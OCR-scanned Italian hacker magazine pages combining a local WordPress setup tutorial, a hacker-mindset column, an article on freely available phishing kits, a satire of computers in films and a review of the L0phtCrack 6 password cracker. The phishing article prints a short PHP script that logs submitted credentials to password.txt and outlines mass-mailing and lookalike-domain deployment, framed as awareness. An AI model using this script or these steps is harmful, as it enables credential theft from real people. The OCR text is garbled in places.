re dall'editor. Tornati al terminale, ri- 
nominiamo il file di configurazione di 
Wordpress mediante il comando se- 
guente: 

sudo mv wp-config-sample.php 
wp-config.php 

:: Eseguiamo lo script 
di installazione 

Ora non rimane che eseguire lo 
script di installazione di Wor- 
dpress. Lanciamo quindi il nostro 
web browser preferito ed apria- 
mo l'URL "http://localhost/blog". 
Se tutto procede correttamente, ap- 
parirà una pagina di benvenuto. In 
caso di utilizzo di Firefox come brow- 
ser, è possibile che al posto di que- 
sta pagina compaia un messaggio di 
errore: in tal caso entriamo nel me- 
nu Strumenti del browser e clicchia- 
mo sulla voce "Elimina i dati perso- 
nali"; nella finestra che appare, quin- 
di, clicchiamo sul pulsante "Elimina i 
dati personali adesso". Alla succes- 
siva apertura dell'indirizzo "http://lo- 




O Figura 3. Questi sono i comandi 
necessari per creare il database MySQL 
della nostra installazione di Wordpress. 
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La possibilità di importare ed 
esportare il contenuto di un 
blog utilizzando un semplice fi- 
le XML è disponibile nelle versio- 
ni più recenti di Wordpress e non 
è esente da alcune limitazioni: 
soprattutto, tale metodo risulta l'ide- 
ale per importare con facilità blog di 
grandi dimensioni. Il metodo alter- 
nativo, più complesso ma anche più 
efficiente, consiste nel copiare in lo- 
cale direttamente il database My- 
SQL ed i file presenti nel blog remo- 
to, capiamo tutti benissimo però il 
rischio di lasciare indietro qualcosa. 
Per maggiori informazioni possiamo 
leggere la pagina web http://www.fa- 
briziosinopoli.it/2009/01/09/trasferi- 
re-un-blog-wordpress-sul-pc/ 



calhost/blog", farà la sua comparsa 
la pagina di benvenuto. 

:: Il blog è pronto 

Nella pagina di benvenuto di 
Wordpress, dunque, indichia- 
mo un Titolo per il blog ed inse- 
riamo il nostro indirizzo email. 

Dato che questa installazione di Wor- 
dpress serve per effettuare esperi- 
menti che andranno poi a convoglia- 
re nel nostro blog online, possiamo 
togliere la spunta dall'opzione "Vo- 
glio che il mio blog appaia su moto- 




tWOKDPR£SS 



-* 



*drnkh 



O Figura 5. La schermata di accesso al 
nostro blog. Inseriamo l'utente admin e la 
sua password. 
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ri di ricerca come 
Google e Techno- 
rati". Infine premia- 
mo il pulsante "In- 
stalla WordPress". 
Nella schermata 
successiva ci ven- 
gono fornite delle 
informazioni im- 
portanti: il nome 
dell'utente per am- 
ministrare il blog, 
chiamato admin, 
e la password di 
questo. A questo 
punto l'installazio- 
ne del nostro blog 
è terminata e pos- 
siamo cliccare sul 
pulsante "Collegati 
in basso nella pagi 
na. Nella schermata che segue (Fi- 
gura 5) inseriamo il nome dell'utente 
(admin) e la password indicata nella 
schermata precedente. 

:: Importiamo i contenuti 
del blog online 

L'interfaccia di amministrazione 
del blog in locale è "http://local- 
host/blog/wp-admin/" mentre l'in- 
dirizzo del blog stesso è, sempli- 
cemente, "http://localhost/blog/". 
Il passo successivo è quello di im- 
portare i contenuti del blog attivo 
su Internet nel blog sul PC. Apria- 
mo quindi la pagina 
di amministrazio- 
ne del blog online 
(ad esempio, "ht- 
tp://www.mioblog. 
it/wp-admin/"), en- 
triamo nella se- 
zione Strumenti e 
quindi nella sot- 
tosezione Espor- 
ta. Nella scherma- 
ta che appare, poi, 
clicchiamo sul pul- 
sante "Scarica fi- 
le di esportazio- 
ne": in questo mo- 
do scaricheremo 
sul PC un file di ti- 
po XML (chiamato, 
ad esempio, wod- 
press. 2009-04-29. 
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O Figura 4. Ecco la pagina di benvenuto di Wordpress. 



xml) con i contenuti del blog online. A 
questo punto apriamo la pagina per 
l'amministrazione del blog locale, en- 
triamo in Strumenti e clicchiamo su 
Importa. Nell'elenco che appare se- 
lezioniamo la voce WordPress, quin- 
di nella schermata che segue inseria- 
mo il percorso del file XML di espor- 
tazione e clicchiamo su "Carica il file 
ed importa" (Figura 6). 
Ora la nostra copia locale del blog è 
perfettamente configurata e funzio- 
nante. Non ci rimane che effettua- 
re tutte le prove di cui necessitiamo, 
senza rischiare di compromettere il 
corretto funzionamento del blog ac- 
cessibile al pubblico. 



J^ Importa WordPress 

Salve? Carica II tuo file WordPress eXtended RSS 
artìcoli, pagine, commenti I campi personalizzati. 

Selezionare un file WXR WordPress da caricare, q 

Selezionare un file sul proprio computer: (Dlmen 
|/ho me/a le/Do wn lo ad/wo rd p ress-2(| pSIio gì i a » . , | 



Cartaa li file ed Importa 



O Figura 6. Importiamo sul blog locale il file XML con il contenuto 
del blog che già abbiamo pubblicato online. 
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[ssere hacker è mette predisposizione mentale: 
le vie per i migliori risaltati 



1 



i siete mai chiesti perché, 
nei migliori luoghi comuni, 
l'hacker è visto come 
uno smanettone ai limiti 
della paranoia con le sue manie, 
le sue fissazioni e i suoi riti? 
La risposta è facile: perché funziona! I 
risultati migliori si ottengono quando la 
predisposizione, mentale e ambientale, 
è quella giusta. E non vale solo per gli 
hacker, è una cosa molto più generica e 
può andare a beneficio di tutti. 

:: Allenamento per la mente 

A dispetto di quanto spesso si legge 
in giro, non è vero che per essere 
hacker bisogna per forza sposare 
una corrente di pensiero parti- 
colare. Per lo meno, non è neces- 
sario essere ligi praticanti di qualche 
strana religione orientale: quello che 
ci basta è ciò che ci permette di rag- 
giungere quello stato di attenzione e 
di apertura mentale utile per il nostro 
scopo, che sia l'accesso a un sistema, 



la sprotezione di un programma, l'in- 
dividuazione di informazioni nascoste 
o quant'altro. Un po' quello che gli 
atleti chiamano "la zona", lo stato in 
cui anche i gesti più difficili riescono 
senza alcuna difficoltà e senza appa- 
rente dispendio di energie. La filosofia 
Zen è quella che vi si avvicina di più 
e, nel nostro ambiente, il motto "qui 
ci vuole un po' di Zen" è tutt'altro che 
una semplice battuta. Prima creiamo 
le condizioni ottimali, eliminando qual- 
siasi fonte di distrazione: chiudiamo la 
porta della stanza e il messenger, 
abbassiamo se possibile le luci, iso- 
liamoci dall'ambiente con musica 
adatta in cuffia e no, hard rock ed 
heavy metal non vanno bene, proviamo 
con Sounds of Nature o un mix di brani 
New Age. Restiamo in questo stato per 
qualche minuto, respirando lentamente, 
fino a quando non riusciamo a foca- 
lizzare la nostra attenzione sul nostro 
compito senza alcuna difficoltà. Ok, il 
bicchierino sta bene se poi non dob- 
biamo guidare, ma solo di vodka russa. 



:: Arti marziali 

Le arti marziali orientali da 
sempre vengono considerate 
ideali per acquisire la giusta 
disciplina nell'affrontare le cose. 

Anche in questo caso, non dobbiamo 
diventare maestri di Karaté o Ju-Jitsu, 
ma fare nostri gli insegnamenti che 
molti stereotipati film sull'argomento 
(specialmente degli anni '80) ci hanno 
propinato. Disciplina! Per raggiungere 
il nostro scopo ci vogliono dedizione 
e perseveranza, altrimenti non appro- 
deremo mai a niente. Rimane un'ultima 
cosa: ci vuole profonda conoscenza 
dei nostri mezzi, delle nostre possi- 
bilità e dei nostri limiti. Dobbiamo stu- 
diare tanto, il tempo speso leggendo 
per informarsi è sempre molto più di 
quello impegnato in azioni dirette. 

Se non credete a quanto detto finora, 
provateci. Scoprirete un nuovo modo 
di vedere le cose e proverete sulla 
vostra pelle che è tutto vero. 
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egli ultimi tempi abbiamo tutti 
notato come i tentativi di phi- 
shing siano diventati più raf- 
finati, più subdoli, e spesso 
ci meravigliamo che ancora oggi 
ci sia qualcuno che si fa abbin- 
dolare dalle famose mail fasulle. 
Ma forse non c'è molto da meravigliarsi: 
ormai queste mail arrivano a dir poco 
alla perfezione, in lingua corretta e del 
tutto simili a quelle che la nostra banca 
o le poste ci invierebbero per una comu- 
nicazione ufficiale e anche i siti in cui si 
finisce quando si clicca sul link pirata che 
esse contengono sono indistinguibili da 
quelli reali se non si fa molta attenzione. 

:: L'inganno 

Sappiamo bene come funzionano le 
cose: arriva una mail nella nostra casella 
di posta, apparentemente spedita 
dalla nostra banca (o da enti simili), 

in cui ci chiedono di fare clic su un 




i 



collegamento per accedere al nostro 
account e confermare i nostri dati ana- 
grafici, oppure per ritirare un premio in 
denaro o con altre scuse simili. Il link 



naturalmente rimanda a un sito pirata, 
riconoscibile spesso solo per l'URL 
riportata nella barra degli indirizzi ma 
per il resto identico a quello reale, in 
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O // contenuto di una raccolta di script per phishing: tra gii altri eBay e YouTube. 
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cui troviamo un modulo da compilare 
con i nostri dati, tra i quali il numero 
della carta di credito. Non appena fac- 
ciamo clic sul pulsante di invio, questo 
dati sensibili che noi crediamo vengano 
inviati ai responsabili della nostra banca 
vengono in realtà inseriti in un database 
di proprietà dei pirati, i quali dispor- 
ranno poi dei mezzi per rubarci somme 
di denaro e la nostra stessa identità. 
Ciò che fa funzionare questo inganno 
è quindi una pagina Web, collegata a 
uno script per la gestione dei dati: tec- 
nicamente si tratta di una cosa molto 
semplice. Se però pensiamo che questi 
script e queste pagine siano in possesso 
solamente di chi li ha scritti, siamo in 
errore: cercando adeguatamente sul 
Web si possono trovare addirittura delle 
raccolte di script contenenti pagine e 
procedure per rubare dati a clienti di 
numerosi siti e numerose banche, pra- 
ticamente pronti all'uso. 

:: Li abbiamo trovati 

Per questioni di sicurezza non pub- 
blichiamo qui i link per poter recu- 
perare queste raccolte, ma non sarà 
difficile, inserendo termini come 
"phishing scripts" in Google, incon- 
trare alcuni siti che le ospitano. 
Il file da scaricare è molto leggero, si 
tratta di qualche KB. Al suo interno, 
ordinati in cartelle che riportano il nome 
del sito o della banca che sono in grado 
di mimare, troviamo la pagina di pre- 
sentazione del modulo da compilare 
da parte del "pollo" da spennare e lo 
script che gestisce i dati inserendoli in 
un database o in un file di testo che poi 
può essere consultato con calma, come 
il pescatore controlla la rete per vedere 
che pesci ha preso. 
La raccolta che abbiamo preso in esame 
è dedicata al phishing dei dati per siti 
Web famosi: eBay, YouTube, persino 
Facebook. Nelle cartelle troviamo due 
script PHP e un file di testo. Il primo 
dei due script è quello che riproduce la 
pagina Web del sito bersaglio, indistin- 
guibile da una reale. Il secondo invece 
si occupa di salvare i dati di accesso 
del malcapitato che dovesse cliccare 
sul link maligno nel file di testo pas- 
sword. txt, che poi si può recuperare 
e consultare con calma. Se tutto va 
come deve, in breve questo file di testo 
dovrebbe riempirsi dei dati di accesso 
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O La pagina "esca " che ci viene mostrata da uno di questi script, in questo caso 
Gmait: è praticamente indistinguibile dall'originale. 



di diverse persone, e chi li ha piazzato 
gli script diventerà padrone della loro 
identità sul sito originale. 

:: Ma funzionano? 

Non resta che provarli: in realtà, in 
questi archivi ci sono solamente gli 
script e i file di testo che dovranno 
contenere le password, tutto il resto 
del lavoro deve farlo chi intende usarli. 
Innanzitutto, occorre un sistema che 
invìi email di massa, l'esca per i pesci. 
Ovviamente deve essere scritto e usato 
in maniera adeguata: deve riprodurre 
una mail ufficiale per essere confusa 



[Script di inserimento] 

<?php 

header( Location: littP://iA/iA/w.gmaìl. 

com"); 

Shandle = fopenCpassword.txt", "a"); 

foreaclHS GET as Svariatale => Svalue) { 

fwrite($handle, Svariatale); 

fwrite($handle, "=")■ 

fwrite($handle, $value) ; 

fwrite($handle, "\r\n") ; 
} 

fwrite($handle, "\r\n") ; 
fclose($handle) ; 
exit; 



con una comunicazione legittima, inviare 
anonimamente questa mail a migliaia di 
persone (più alti sono i numeri e più 
facile è per il cattivo di turno avere suc- 
cesso) e porre gli script e il file di testo 
corrispondente su un sito proprio. Ma 
per fare le cose fatte bene l'indirizzo di 
questo sito deve poter essere confuso 
con quello del sito reale, altrimenti l'in- 
ganno viene svelato. Bisognerebbe 
quindi registrare un dominio simile a 
quello reale, ma non si possono usare i 
dati personali reali dato che, visto che si 
sta commettendo un reato, non si vuole 
certo finire per essere beccati dalle 
forze dell'ordine. Funzionare, quindi, 
dovrebbero funzionare, ma non è così 
semplice come trovare questi archivi poi 
implementare un sistema adeguato per 
poterli usare. 



:: La sorpresa 

Ciò che ci ha meravigliato di più non 
è tanto il funzionamento ingegnoso 
del sistema, che dopotutto non è 
nemmeno complesso da implementare. 

Ci ha sorpreso invece la facilità con cui 
è possibile trovare questi script nella 
Rete, quasi come si trattasse di cose 
normali. Il nostro vantaggio è che, dispo- 
nendone, possiamo studiare le tecniche 
di offesa dei malintenzionati per poterci 
difendere, ma rimaniamo comunque 
all'erta, perché se queste raccolte sono 
così diffuse e facili da trovare, vuol dire 
anche che aumenteranno a dismisura 
i tentativi di chi vorrà soffiarci la nostra 
password di Facebook o Gmail. 
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Qome si sconfiggono gli 
alieni? Ma è semplice: 
basta entrare nella loro 
nave madre, collegare il 
Fido Macintosh al loro server 
principale e passargli un virus. 
Trattandosi di un film di fantascienza, Inde- 
pendence Day, è normale che tutto sia fan- 
tascientifico ma dovrebbe almeno essere 
credibile. Invece si fatica a credere che un 
Mac si possa collegare senza problemi a 
normali reti di PC, figuriamoci a un server 
alieno. Più di uno ha pensato che il film 
rappresentava alieni non troppo evoluti, 
anche considerando che un virus infor- 
matico creato per un Mac non funziona per 
PC o per Linux (e viceversa). Quindi questi 
alieni dovevano usare un server Mac: fan- 
tascientifico lo è di sicuro, credibile un po' 
meno. Di certo c'è che Independence Day 



è un film che dal punto di vista informatico 
è in ottima compagnia: a partire da War- 
games, del lontano 1983, fino agli ulti- 
missimi film, non sembra proprio che l'in- 
formatica sia una materia particolarmente 
studiata dagli sceneggiatori. 

:: Evvai di missili! 

Proprio Wargames introduce un 
tema caro a tutti gli sceneggiatori: 
con un collegamento di qual- 
siasi genere si può fare di tutto. 

Se una volta bastava fare un colpo di 
telefono al supercomputer che controlla 
tutte le testate atomiche USA, dotato di 
una sola e singola password di accesso, 
oggi è addirittura più semplice. Tramite 
Internet ci si inserisce nei circuiti bancari, 
ci si dà al gossip intercettando le immagini 



dei satelliti militari, si consultano banche 
dati supersegrete, si modificano gli allarmi 
delle banche... Il tutto con pochissime 
o nulle difficoltà. Una situazione leg- 
germente diversa da quella reale, dove 
un hacker che penetra in un sistema di 
difese di media entità impiega comunque 
notevoli sforzi e molto tempo oppure si 
deve avvalere di uno staff. Senza contare 
che molti sistemi non sono connessi alla 
Rete e, come nel caso dei circuiti bancari, 
dispongono di reti, isolate, proprie. Pro- 
babilmente è un problema di noi infor- 
matici comuni: abbiamo oggettive diffi- 
coltà di apprendimento. Se così non fosse 
sarebbe difficile spiegarsi le parole della 
ragazzina dodicenne di Jurrasic Park che 
salva tutti agendo su un sistema Unix 
e affermando che "Questo è UNIX, è 
semplice". Dopotutto è quello che pen- 
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O Diverse aziende, tra cui Sony, stanno 
studiando gli schermi 3D. Saranno splendidi 
per giocare e fare gr africa ma per impartire 
comandi sono meglio gli schermi 2D. 

siamo nel profondo tutti noi. Lei, in più e 
per sua stessa ammissione, l'aveva stu- 
diato a scuola: più facile di così... Anzi: 
è consolante sapere che i soldi dei con- 
tribuenti vengano spesi così bene da riu- 
scire a insegnare UNIX ai ragazzini. La 
poca comprensione di noi informatici della 
nostra materia è comunque abissale, con- 
siderando che, per esempio, è normale 
che su un floppy sia possibile trasferire 
immensi progetti oppure l'intero scibile 
dell'umanità in pochi minuti (general- 
mente un istante prima dell'arrivo della 
guardia), così come è normale che l'ac- 
cesso a qualsiasi sistema chieda, con una 
finestra enorme e piuttosto appariscente, 
qual è la password. Quindi i nostri dischi 
crittati e nascosti con TrueCrypt sono roba 
vecchia e dobbiamo farcene una ragione. 
Le dimensioni, poi, sono decisamente 
un'opinione: a fronte di normali monitor 
con caratteri di dimensioni inferiori al centi- 
metro, i monitor dei film usano dei caratteri 
system da almeno 5 cm. 

:: Non sanno fare clic... 

Altra questione è la scrittura: chiunque 
usi un computer in un film, special- 
mente se mostrato come sfondo di 
una scena principale, sta scrivendo. 

Probabilmente una nuova versione della 
Divina Commedia, visto che tutti, in innu- 
merevoli film, sembrano ignorare total- 
mente il mouse. Almeno: quando c'è, visto 
che in molti computer sembra sparito. In 



compenso, in alcuni film viene usato per 
rispondere ai messaggi di posta. Perché 
la posta, nei film, esiste e tutti i messagig 
che si ricevono sono significativi. I filtri 
antispam sono così potenti che nessun 
messaggio è inutile. Che dire, poi, dei 
computer in sé? Nella vita di tutti i giorni 
vediamo come gli apparecchi veramente 
complessi subiscano riduzioni di dimen- 
sioni in modo regolare mentre nei film, 
generalmente, più una cosa è complessa 
e più deve essere grande. Ovviamente, 
più è grande e tanto maggiori devono 
essere i tasti di cui dispone che, gene- 
ralmente, non hanno alcuna etichetta 
(perché chi le usa sa tutto a memoria) 
oppure ne hanno pochissime tra cui l'im- 
mancabile dell'autodistruzione. Tasto 
che, naturalmente, potrebbe non fun- 
zionare correttamente ma non c'è pro- 
blema: nei film c'è sempre una procedura 
manuale che supplisce alle mancanze 
delle macchine. Si può obiettare che a 
fronte di errori clamorosi, in alcuni film si 
offra una descrizione realistica delle cose 
ma, anche qui, l'errore è in agguato. 

:: Futuro? Bah! 

Dall'esperienza di tutti i giorni e da 
studi di settore, per esempio, è assi- 
curato che le interfacce 2D a caratteri 
e pulsanti permettono di svolgere 

in modo estremamente veloce e preciso 
compiti anche complessi, difficilmente 
gestibili, per gli umani, in ambienti 3D 
oppure con comandi di altro genere. 
Ovviamente, siccome Minority Report è 
ambientato nel futuro, doveva esserci per 
forza uno schermo 3D su cui muovere 
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O Interfacce 3D da usare tutti i giorni? Alcune 
ci sono già, almeno a livello sperimentale, ma 
non sono pratiche come si vuol far credere. 



O Sembra che tutti i notebook dei film 
abbiano la potenza di un CRAY e permet- 
tano di navigare a velocità super da qual- 
siasi angolo del mondo. Invidia! 

finestre, alla faccia dell'usabilità del 
sistema: è moderno, è cool e va usato. 
Così come il computer dell'Enterprise 
non solo capisce il linguaggio umano ma 
è telepatico: a fronte di comandi brevi, 
riesce ad eseguire una serie di opera- 
zioni complesse e dettagliate. Allo stesso 
tempo è normale che sugli schermi della 
Nabucodònosor di Matrix scorrano scritte 
"in codice sorgente" che debbano essere 
interpretate quando sarebbe stato tanto 
più facile, in un mondo così tecnologico, 
far interpretare i simboli direttamente a 
un computer. Lasciamo stare, poi, le con- 
nessioni: veramente da sogno, ovunque! 
Qualsiasi portatile fornisce immagini in 
videoconferenza in tempo reale in qual- 
siasi parte del globo e ha prestazioni 
degne di un CRAY. Ovviamente senza 
cavi e senza antenne, che sono cose 
superate. Allo stesso tempo, malgrado 
l'usabilità discutibile, nei film succede che 
chiunque sappia usare qualsiasi inter- 
faccia. Anche quelle che non ha mai visto 
prima. Il che è sintomo di un monopolio 
dei creatori di interfacce oppure dell'uso 
di un solo sistema operativo per qualsiasi 
dispositivo. Alcuni obietteranno che tutte le 
rimostranze fatte fino a qui sono poca roba 
rispetto alle storie che vengono raccontate 
nei film. Proprio questo, secondo noi, è 
il problema: a fronte di investimenti per 
milioni di dollari, spenderne un centinaio 
per far leggere il copione da un qualsiasi 
informatico permetterebbe di ottenere un 
prodotto certamente più realistico. 
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rilascio (LC5) torna I inso- 
stituibile tool in una veste 
completamente rinnovata. 

La versione precedente era stata 
venduta alla Symantec che, dovendo 
obbedire alle nuove regole imposte 
dal governo americano, non poteva 
vendere al di fuori di USA e Canada. 
In realtà Symantec acquistò l'azienda 
che aveva prodotto il tool, la @stake, 
probabilmente per controllare un pro- 
dotto che funzionava troppo bene, 
che aggrediva il "suo" mercato e, 
probabilmente, troppo potente per 
poterlo inserire all'interno della sua 
offerta commerciale. Ma proprio 
all'inizio di quest'anno, il team ori- 
ginario LOphtcrack ha riacquistato 
il software dalla Symantec e lo ha 
aggiornato alla versione 6 (LC6) ren- 
dendolo disponibile a tutti in forma 
demo (www.IOphtcrack.com). 



a c'è di nuovo 

LC6 è composto da svariati stru- 
menti le cui caratteristiche sono 
rese interessanti dalla possibilità 
di schedularle e soprattutto di 
poter sfruttare la potenza di calcolo 
delle versioni a 64 bit di Windows, 
oltre che del supporto di algoritmi mul- 
tiprocessore, monitoraggio di rete e 
decodifica. E va detto che è tuttora il 
più semplice tool da utilizzare per recu- 
perare la password, con un'interfaccia 
intuitiva e semplice da usare, ma non 
solo. Sono stati infatti introdotti alcuni 
wizard che permettono anche all'am- 
ministratore con meno esperienza di 
condurre indagini di sicurezza di alto 
livello, ricevendo indietro una mole 
di informazioni che con altri metodi 
richiederebbero molto più tempo (e 
anche molte più conoscenze). Al di là 
del giudizio personale infatti, va rico- 



nosciuto al programma il merito di 
organizzare la raccolta di informazioni 
corredandola di rappresentazioni gra- 
fiche e dati statistici che possono sod- 
disfare anche i palati più difficili. 



O L'interfaccia della nuova versione di 
LOphtcrack è stata rinnovata e si presenta 
con un look decisamente più moderno. 
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O Le procedure wizard rendono l'utilizzo 
del programma estremamente semplice e 
intuitivo anche per i meno esperti. 

-.: Le caratteristiche del tool 

L'elenco delle funzionalità di LC6 
è molto lungo e riportiamo solo le 
informazioni principali che vengono 
pubblicizzate dal team: 
Password Scoring 
LC6 valuta le password in base a un 
determinato punteggio, dato dalla 
conoscenza delle migliori raccoman- 
dazioni utilizzate al momento dall'indu- 
stria. I possibili risultati possono essere: 
Strong, Medium, Weak, or Fail. 
Pre-computed Dictionary Support 
Per sessioni di verifica delle sicurezze, 
è un obbligo possedere dei dizionari 
di password pre-calcolate e LC6 sup- 
porta gli hashes delle password. In 
questo modo un audit può durare dei 
minuti invece che ore o giorni. 
Windows & Unix Password Support 
LC6 importa e cracca file di password 
di Unix ed è in grado di effettuare un 
audit partendo da una singola inter- 
faccia di rete. 

Remote password retrieval 
LC6 è in grado di importare le pas- 
sword da un Windows remoto, incluse 
le versioni a 64 bit di Vista, Windows 7 
e macchine UNIX, senza ulteriori sof- 
tware di terze parti. 
Scheduled Scans 
L'attività di auditing di LC6 può 
essere schedulata su base giorna- 
liera, settimanale, mensile o ese- 
guita soltanto una volta. 
Remediation 

LC6 offre una valutazione di soluzioni 
alternative per gli account con password 



poco sicure. Tali account possono 
essere disabilitati o le loro password 
possono essere fatte scadere diretta- 
mente dall'interfaccia di LC6. 
Updated Vista/Windows 7 Style Ul 
L'interfaccia utente è stata migliorata 
e aggiornata. Più informazioni sono 
accessibili per ogni account, inclusa 
l'età della password, lo stato dei blocchi 
e lo stato dell'account (se è attivo o è 
stato disabilitato ad esempio) 
Executive Level Reporting 
LC6 ha un'interfaccia real-time, 
divisa in più colonne. I risultati degli 
auditing sono visualizzati sulla base 
del metodo di auditing, il grado di 
rischiosità e set dei caratteri usati 
dalla password. 
Password Risk Status 
Visualizza lo stato del rischio in quattro 
diverse categories: Empty, High Risk, 
Medium Risk, and Low Risk. 
Password Audit Method 
Visualizza la completezza dei quattro 
metodi usati da LC6: Dictionary, 
HybridHybrid, Precomputed, and 
Brute Force. 

Password Character Sets 
Visualizza la completezza del 
set di caratteri usati, inclu- 
dendo caratteri alfanumerici, 
simboli, caratteri internazionali. 
Password Length Distribution 
Visualizza la lunghezza media della 
password scoperta per ogni account. 
Summary Report 

Riassume lo stato della password 
(Locked, Disabled, Expired) o se la 
password è più vecchia di 180 giorni. 
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O / report delle azioni compiute vengono 
presentati sotto forma grafica per una im- 
mediata visualizzazione e comprensione. 

Summary 

Numero degli account craccati e il 
numero dei Domini testati. 
Foreign Password Cracking 

LC6 supporta i set di caratteri stranieri 
per il Brute Force, così come dizionari 
esterni. Tramite i menu a tendina è 
possibile cambiare la lingua e il set di 
caratteri. LC6 viene comunque fornito 
con diversi dizionari stranieri. 



:: Quanto costa 



O LOphtcrack è in grado ri ottenere le 
password all'interno di una rete Windows 
NT72000/2003 e Unix sotto ssh. 



LC6 è decisamente un prodotto 
destinato a rivoluzionare la scena 
dei tool di sicurezza ed è disponibile 
in tre versioni per tutte le tasche: 

Professional (295$), Administrator 
(595$) e Consultant (1195$). Sostan- 
zialmente le ultime due differiscono 



per la quantità di chent che si possono 
analizzare e per un avanzato controllo 
delle tabelle di hash delle password. 

Per avere un'idea di tutte le pos- 
sibilità offerte, oltre chiaramente 
a provare liberamente il prodotto 
che in versione demo permette di 
effettuare svariate analisi, vi consi- 
gliamo di leggere la documentazione. 
La manualistica è liberamente 
consultabile online all'indirizzo 
HYPERLINK "http://www.lOphtcrack. 
com/help"www.lOphtcrack.com/help 
e sono presenti diversi tutorial che 
spiegano passo passo come svi- 
luppare un'analisi tramite LC6. 

Massimiliano Brasile 
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